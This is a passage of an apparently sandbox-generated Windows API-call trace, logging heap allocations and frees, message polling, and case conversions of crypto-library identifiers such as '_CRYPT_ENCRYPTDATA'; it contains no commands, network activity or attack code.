[0081.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17655) returned 0x499a008 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.552] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0081.552] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0081.552] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0081.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a50 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0081.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17655) returned 0x499a008 [0081.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a20 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b00 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29d0 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0081.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb228 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17655) returned 0x49c8cc8 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0081.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0081.554] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0081.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0081.554] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0081.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0081.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0081.554] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0081.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0081.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29c0 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0081.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0081.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb150 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0081.555] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0081.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.555] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0081.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.556] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0081.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0081.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0f0 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.557] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0081.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0081.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0081.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0081.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0081.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0081.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0081.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0081.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0081.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.559] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0081.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0081.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 